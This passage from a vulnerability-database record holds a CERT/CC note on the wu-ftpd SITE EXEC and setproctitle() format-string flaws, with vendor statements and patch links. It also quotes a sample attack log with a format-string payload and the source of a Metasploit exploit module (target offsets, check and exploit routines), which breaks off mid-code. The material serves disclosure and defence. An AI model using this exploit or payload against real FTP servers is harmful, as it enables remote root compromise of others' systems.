vulnerable. \n \nThe vulnerability appears to be exploitable if a local user account can be used for ftp login. Also, if the \"site exec\" command functionality is enabled, then anonymous ftp login allows sufficient access for an attack. \n \n**setproctitle() Vulnerability** \n \nA separate vulnerability involving a missing character-formatting argument in setproctitle(), a call which sets the string used to display process identifier information, is also present in wu-ftpd. Other ftpd implementations have been found to have vulnerable setproctitle() calls as well, including those from proftpd and OpenBSD. \n \nThe setproctitle() vulnerability appears to have been present in various ftpd implementations since at least BSD ftpd 5.51 (which predates wuarchive-ftpd 1.0). It has also been confirmed to be present in BSD ftpd 5.60 (the final BSD release). Any vendors who have based their own ftpd distributions on this vulnerable code are also likely to be vulnerable. \n \nIt should be noted that many operating systems do not support setproctitle() calls. However, other software engineering defects involving the same type of missing character-formatting argument may be present. \n \n**Intruder Activity** \n \nOne possible indication you are being attacked with either of these vulnerabilities may be the appearance of syslog entries similar to the following: \n\n \n`Jul 4 17:43:25 victim ftpd[3408]: USER ftp \nJul 4 17:43:25 victim ftpd[3408]: PASS [malicious shellcode] \nJul 4 17:43:26 victim ftpd[3408]: ANONYMOUS FTP LOGIN FROM \nattacker.example.com [10.29.23.19], [malicious shellcode] \nJul 4 17:43:28 victim-site ftpd[3408]: SITE EXEC (lines: 0): \n%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f% \n.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. \nf%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f \n%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f% \n.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. \nf%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f \n%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f|%p \nJul 4 17:43:28 victim ftpd[3408]: FTP session closed` \nDetails and exploits for both the \"site exec\" and setproctitle() vulnerabilities have been posted in various public forums. Please see [_http://www.securityfocus.com/vdb/bottom.html?section=discussion&amp;vid=1387_](<http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=1387>)_ \n_[_http://www.securityfocus.com/vdb/bottom.html?section=discussion&amp;vid=1425_](<http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=1425>)_ \n_[_http://ciac.llnl.gov/ciac/bulletins/k-054.shtml_](<http://ciac.llnl.gov/ciac/bulletins/k-054.shtml>) \nThe CERT/CC has received reports of both of these vulnerabilities being successfully exploited on the Internet. Please check our [_Current Activity_](<http://www.cert.org/current/current_activity.html>) page for updates regarding intruder activity involving these vulnerabilities. \n--- \n \n### Impact \n\nBy exploiting any of these input validation problems, local or remote users logged into the ftp daemon may be able execute arbitrary code as root. An anonymous ftp user may also be able to execute arbitrary code as root. \n \n--- \n \n### Solution \n\n**Upgrade your version of ftpd** \nPlease see the vendors records in this vulnerability note for more information about the availability of updated ftpd packages specific for your system. \n \n**Apply a patch from your vendor** \nIf you are running vulnerable ftpd implementations and cannot upgrade, you need to apply the appropriate vendor patches and recompile and/or reinstall the ftpd server software. \n \nThe vendor section of this document contains information provided by vendors. We will update the appendix as we receive more information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact your vendor directly. \n \n**Disable ftp services** \nIf neither an upgrade nor a patch can be applied, the CERT/CC recommends disabling all vulnerable wu-ftpd and proftpd servers. While disabling \"site exec\" command functionality or anonymous ftp access minimizes exposure to the \"site exec\" vulnerability, neither is a complete solution and may not mitigate against the risks involved with exposure to the setproctitle() vulnerability. \n \n--- \n \n### Vendor Information\n\n29823\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Conectiva __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see: \n\n \n[_http://www.securityfocus.com/templates/archive.pike?list =1&amp;msg=20000623212826.A13925@conectiva.com.br_](<http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000623212826.A13925@conectiva.com.br>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Debian __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see the following regarding the wu-ftpd \"site exec\" issue: \n\n \n<http://www.debian.org/security/2000/20000623> Copyright \u00a9 1997-2000 SPI \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Hewlett Packard __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nHP is vulnerable. Please see: \n\n \nHPSBUX0007-117: Sec. Vulnerability in ftpd, **Rev.01** HEWLETT-PACKARD COMPANY SECURITY ADVISORY: #00117, 11 July '00, Last Revised: 12 July '00 \nAn excerpt:\n\nPROBLEM: The ftp server (ftpd) on HP-UX allows users root access. \nPLATFORM: HP-UX release 11.00 - Both Problem #1 and #2 below; HP-UX release 10.20 - Problem #2, setproctitle(), only \nDAMAGE: Unauthorized root access. \nSOLUTION: Install temporary binary until an official patch is released. \nAVAILABILITY: The temporary binary is available now (see below). \n\n\n* * *\n\n \nA. BackgroundThere are 2 problems with FTP Server (ftpd) on HP-UX. \n 1. ftpd handling of the SITE EXEC command that allows remote users to gain root access. This is possible in the default configuration of ftpd on HP-UX 11.00 ONLY. \n 2. ftpd does not properly format the parameters to the setproctitle() function, allowing users to gain root access. This problem applies to both 11.00 and 10.X. \nB. Fixing the problemAll system administrators are encouraged to install our temporary binary until an official patch is released. The file can be retrieved to simply replace the original factory supplied binary. C. Recommended solutionTwo temporary ftp binaries (for HP-UX 11.00 and HP-UX 10.20) can be found at: \n[_ftp://ftp.cup.hp.com/dist/networking/ftp/ftpd.11.0_](<ftp://ftp.cup.hp.com/dist/networking/ftp/ftpd.11.0>) _ \n_[_ftp://ftp.cup.hp.com/dist/networking/ftp/ftpd.10.20_](<ftp://ftp.cup.hp.com/dist/networking/ftp/ftpd.10.20>) \n**Revised 01** \n\\---&gt;&gt;&gt;These are to be installed in /usr/lbin/ftpd, with permissions 544. NOTE: This advisory [HPSBUX0007-117] will be updated when patches become available. \nCopyright \u00a9 2000 Hewlett-Packard Company \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### NetBSD __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see NetBSD Security Advisories NetBSD-SA2000-009 &amp; NetBSD-SA2000-010: \n\n \n[_ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-009.txt.asc_](<ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-009.txt.asc>) _ \n_[_ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-010.txt.asc_](<ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-010.txt.asc>) Copyright \u00a9 2000, The NetBSD Foundation, Inc. All Rights Reserved. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### OpenBSD __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe setproctitle bug is in OpenBSD. Please see: \n\n \n[_http://www.openbsd.org/errata.html#ftpd_](<http://www.openbsd.org/errata.html#ftpd>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Washington University __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe WU-FTPD Development Group's primary distribution site is mirrored world-wide. A list of mirrors is available from: \n\n \n[_http://www.wu-ftpd.org/mirrors.txt_](<http://www.wu-ftpd.org/mirrors.txt>) If possible, please use a mirror to obtain patches or the latest version. \n \n**Upgrade your version of wu-ftpd** \nThe latest release of wu-ftpd, version 2.6.1, has been released to address these and several other security issues: \n\n[_ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz>) _ \n_[_ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz.asc_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz.asc>) _ \n_[_ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z>) _ \n_[_ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z.asc_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z.asc>) \n**Apply a patch** \nThe wu-ftpd developers have published the following patch for wu-ftpd 2.6.0: \n\n[_ftp://ftp.wu-ftpd.org/pub/ wu-ftpd/patches/apply_to_2.6.0/lreply-buffer-overflow.patch_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_2.6.0/lreply-buffer-overflow.patch>) _ \n_[_ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_2.6.0/lreply-buffer-overflow.patch.asc_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_2.6.0/lreply-buffer-overflow.patch.asc>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### BSDI __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCurrent versions of BSD/OS do not include any version of wu-ftpd. The BSDI ftpd is not vulnerable to the reported problems; it is not based on the wu-ftpd code. \n\nThe version of ftpd in modern versions of BSD/OS is not vulnerable to the generic setproctitle() vulnerabilities. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### FreeBSD __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe version of ftpd shipped with all versions of FreeBSD since 2.2.0 is not vulnerable to this problem. FreeBSD also ships with several optional third-party FTP servers in the Ports Collection, including wu-ftpd and proftpd. The wu-ftpd vulnerability was corrected on 2000/06/24 and is the subject of [_FreeBSD Security Advisory SA-00:29_](<ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00%3A29.wu-ftpd.asc.v1.1>). At this time no patch has been released by the proftpd vendor and the version in FreeBSD ports is still vulnerable to this attack. FreeBSD makes no guarantee about the security of third-party software in the ports collection and users are advised that there may be security vulnerabilities in other FTP servers available there.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nAn _update_ to proftpd is now available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Fujitsu __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFujitsu's UXP/V operating system is not vulnerable to any of the vulnerabilities discussed in [this] advisory. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Microsoft __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe IIS FTP service is not is not affected by these issues.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Porcupine.org __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n[...] None of my software [ftpd from my [_logdaemon_](<ftp://ftp.porcupine.org/pub/security/index.html#software>) utilities] has either the \"site exec\" or \"setproctitle\" features enabled. \n\nWietse Venema_ \n_[_mailto:wietse@porcupine.org_](<mailto:wietse@porcupine.org>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### SGI __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nIRIX ftpd is not vulnerable to the issues mentioned in this advisory. See [_ftp://sgigate.sgi.com/security/20000701-01-I_](<ftp://sgigate.sgi.com/security/20000701-01-I>) for more information. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Sun __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nSISP FTPD is similar to wu-ftpd. SISP FTPD does not allow site exec nor does it use setproctitle(). Therefore, SISP FTPD does not appear to be vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Caldera __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nPlease see CSSA-2000-020.0 regarding the wu-ftpd issue and OpenLinux: \n\n \n[_ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-020.0.txt_](<ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-020.0.txt>) Copyright \u00a9 2000 Caldera Systems, Inc. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Compaq Computer Corporation __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nAt the time of writing this document, this reported problem is currently still under evaluation by engineering to determine the requirement of a solution if necessary. COMPAQ will provide an update to this advisory accordingly. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### MIT Kerberos Development Team __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nIt seems that the MIT Kerberos ftpd is based on BSD ftpd revision 5.40, and has never contained any serious format string related bugs for some reason. It is possible that by defining an undocumented CPP macro SETPROCTITLE, calls to setproctitle() can be made, however, there is an internally declared setproctitle() function that does not take a format string as its argument, and is hence not vulnerable.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### MandrakeSoft __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nPlease see the MANDRAKE 7.1 update section for wu-ftpd information at: \n\n \n[_http://www.linux-mandrake.com/en/fupdates.php3_](<http://www.linux-mandrake.com/en/fupdates.php3>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### ProFTPD __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nUpgrade to ProFTPD 1.2.0: \n\n \n[_http://www.proftpd.net/download.html_](<http://www.proftpd.net/download.html>) Please see the discussion concerning setproctitle() at [_http://www.proftpd.org/proftpd-l-archive/00-07/msg00059.html_](<http://www.proftpd.org/proftpd-l-archive/00-07/msg00059.html>) _ \n_[_http://www.proftpd.org/proftpd-l-archive/00-07/msg00060.html_](<http://www.proftpd.org/proftpd-l-archive/00-07/msg00060.html>) _ \n_[_http://bugs.proftpd.net/show_bug.cgi?id=121_](<http://bugs.proftpd.net/show_bug.cgi?id=121>) _ \n_[_http://www.proftpd.net/security.html_](<http://www.proftpd.net/security.html>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### RedHat __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nPlease see RHSA-2000-039-02 regarding the wu-ftpd issue: \n\n \n[_http://www.redhat.com/support/errata/RHSA-2000-039-02.html_](<http://www.redhat.com/support/errata/RHSA-2000-039-02.html>) Copyright \u00a9 2000 Red Hat, Inc. All rights reserved. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Slackware __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nPlease see the patches made available regarding the wu-ftpd issue, at: \n\n \n[_ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/wu-ftpd-patch.README_](<ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/wu-ftpd-patch.README>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### SuSE __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nPlease see SuSE Security Announcement #53 regarding the wu-ftpd issue, at: \n\n \n[_http://www.suse.de/de/support/security/suse_security_announce_53.txt_](<http://www.suse.de/de/support/security/suse_security_announce_53.txt>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\nView all 21 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-2000.02>\n * <http://www.securityfocus.com/bid/1387>\n * <ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_2.6.0/lreply-buffer-overflow.patch>\n * <ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz>\n * <ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz.asc>\n * <ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z>\n * <ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z.asc>\n * <http://ciac.llnl.gov/ciac/bulletins/k-054.shtml>\n * <http://www.linuxsecurity.com/advisories/advisory_documents/other_advisory-499.html (CONECTIVA),>\n * <ftp://ftp.conectiva.com.br/pub/conectiva/>\n * <http://www.debian.org/security/2000/20000623>\n * <ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-020.0.txt http://www.redhat.com/support/errata/RHSA-2000-039-02.html>\n * <http://www.linux-mandrake.com/en/fupdates.php3 ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/wu-ftpd-patch.README http://www.suse.de/de/support/security/suse_security_announce_53.txt>\n * <ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00%3A29.wu-ftpd.asc.v1.1>\n * <ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-009.txt.asc>\n * <ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-010.txt.asc>\n * <ftp://sgigate.sgi.com/security/20000701-01-I>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0573>\n * [http://www.securityfocus.com/templates/forum_message.html?forum=2&amp;head=3342&amp;id=3342](<http://www.securityfocus.com/templates/forum_message.html?forum=2&head=3342&id=3342>)\n * [http://www.securityfocus.com/templates/archive.pike?list=1&amp;mid=66842](<http://www.securityfocus.com/templates/archive.pike?list=1&mid=66842>)\n * <http://www.proftpd.net/download.html>\n * <http://www.proftpd.org/proftpd-l-archive/00-07/msg00059.html>\n * <http://www.proftpd.org/proftpd-l-archive/00-07/msg00060.html>\n * <http://bugs.proftpd.net/show_bug.cgi?id=121>\n * <http://www.proftpd.net/security.html>\n * <http://www.openbsd.org/errata.html#ftpd>\n * <http://www.redhat.com/support/errata/RHSA-2000-039-02.html>\n\n### Acknowledgements\n\nThe CERT Coordination Center thanks Gregory Lundberg and Theo de Raadt for their help in developing this document.\n\nThis document was written by Jeff S Havrilla.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2000-0573](<http://web.nvd.nist.gov/vuln/detail/CVE-2000-0573>) \n---|--- \n**CERT Advisory:** | [CA-2000-13 ](<http://www.cert.org/advisories/CA-2000-13.html>) \n**Severity Metric:** | 87.72 \n**Date Public:** | 2000-06-23 \n**Date First Published:** | 2000-10-02 \n**Date Last Updated: ** | 2001-02-19 22:04 UTC \n**Document Revision: ** | 7 \n", "modified": "2001-02-19T22:04:00", "published": "2000-10-02T00:00:00", "id": "VU:29823", "href": "https://www.kb.cert.org/vuls/id/29823", "type": "cert", "title": "Format string input validation error in wu-ftpd site_exec() function", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-13T00:43:30", "description": "This module exploits a format string vulnerability in versions of the Washington University FTP server older than 2.6.1. By executing specially crafted SITE EXEC or SITE INDEX commands containing format specifiers, an attacker can corrupt memory and execute arbitrary code.\n", "published": "2009-12-06T02:30:42", "type": "metasploit", "title": "WU-FTPD SITE EXEC/INDEX Format String Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/FTP/WUFTPD_SITE_EXEC_FORMAT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Exploit::FormatString\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WU-FTPD SITE EXEC/INDEX Format String Vulnerability',\n 'Description' => %q{\n This module exploits a format string vulnerability in versions of the\n Washington University FTP server older than 2.6.1. By executing\n specially crafted SITE EXEC or SITE INDEX commands containing format\n specifiers, an attacker can corrupt memory and execute arbitrary code.\n },\n 'Author' => [ 'jduck' ],\n 'References' =>\n [\n ['CVE', '2000-0573'],\n ['OSVDB', '11805'],\n ['BID', '1387']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'PrependChrootBreak' => true\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n # format string max length\n 'Space' => 256,\n # NOTE: \\xff's need to be doubled (per ftp/telnet stuff)\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x25\\x2f\",\n 'DisableNops'\t=> 'True',\n 'StackAdjustment' \t=> -1500\n },\n 'Platform' => [ 'linux' ],\n 'Targets' =>\n [\n #\n # Automatic targeting via fingerprinting\n #\n [ 'Automatic Targeting', { 'auto' => true } ],\n\n #\n # specific targets\n #\n [\t'Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)',\n {\n 'UseDPA' \t=> false,\n 'PadBytes'\t=> 3,\n 'NumPops' \t=> 8,\n 'AddrPops' => 100,\n 'Offset' => -2088, \t\t\t# offset to stack return\n 'Writable' \t=> 0xbfffde26, \t# stack, avoid badchars\n 'FlowHook'\t=> -1, # auto now... 0xbffff1e4\t\t# stack return addr\n }\n ],\n # these aren't exploitable (using built-in, stripped down vsprintf, no %n)\n #[\t'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)',\n #[\t'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)',\n #[\t'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)',\n [\t'RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)',\n {\n 'UseDPA' \t=> true,\n 'PadBytes'\t=> 2,\n 'NumPops' \t=> 276,\n 'AddrPops' => 2,\n 'Offset' => -17664, \t\t\t# offset to stack return\n 'Writable' \t=> 0x806e726,\t\t# bss\n #'Writable' \t=> 0xbfff0126,\t\t# stack, avoid badchars\n 'FlowHook'\t=> -1, # auto now... 0xbfffb028\t\t# stack return addr\n #'FlowHook' => 0x806e1e0\t\t# GOT of sprintf\n }\n ],\n\n #\n # this one will detect the parameters automagicly\n #\n [\t'Debug',\n {\n 'UseDPA' \t=> false,\n 'PadBytes'\t=> 0,\n 'NumPops' \t=> 0,\n 'AddrPops' => -1,\n 'Offset' => -1,\n 'Writable' \t=> 0x41414242, \t#\n 'FlowHook'\t=> 0x43434545\t\t#\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 22 2000'))\n register_options(\n [\n Opt::RPORT(21),\n ])\n end\n\n\n def check\n # NOTE: We don't care if the login failed here...\n ret = connect_login\n\n # We just want the banner to check against our targets..\n vprint_status(\"FTP Banner: #{banner.strip}\")\n status = Exploit::CheckCode::Safe\n if banner =~ /Version wu-2\\.(4|5)/\n status = Exploit::CheckCode::Appears\n elsif banner =~ /Version wu-2\\.6\\.0/\n status = Exploit::CheckCode::Appears\n end\n\n # If we've made it this far, we care if login succeeded.\n if (ret)\n # NOTE: vulnerable and exploitable might not mean the same thing here :)\n if not fmtstr_detect_vulnerable\n status = Exploit::CheckCode::Safe\n end\n if not fmtstr_detect_exploitable\n status = Exploit::CheckCode::Safe\n end\n end\n\n disconnect\n return status\n end\n\n\n def exploit\n\n if (not connect_login)\n fail_with(Failure::Unknown, 'Unable to authenticate')\n end\n\n # Use a copy of the target\n mytarget = target\n\n if (target['auto'])\n mytarget = nil\n\n print_status(\"Automatically detecting the target...\")\n if (banner and (m = banner.match(/\\(Version wu-(.*)\\) ready/))) then\n print_status(\"FTP Banner: #{banner.strip}\")\n version = m[1]\n else\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n\n regexp = Regexp.escape(version)\n self.targets.each do |t|\n if (t.name =~ /#{regexp}/) then\n mytarget = t\n break\n end\n end\n\n if (not mytarget)\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n else\n print_status(\"Trying target #{mytarget.name}...\")\n if banner\n print_status(\"FTP Banner: #{banner.strip}\")\n end\n end\n\n # proceed with chosen target...\n\n # detect stuff!\n if mytarget.name == \"Debug\"\n #fmtstr_set_caps(true, true)\n # dump the stack, so we can detect stuff magically\n print_status(\"Dumping the stack...\")\n stack = 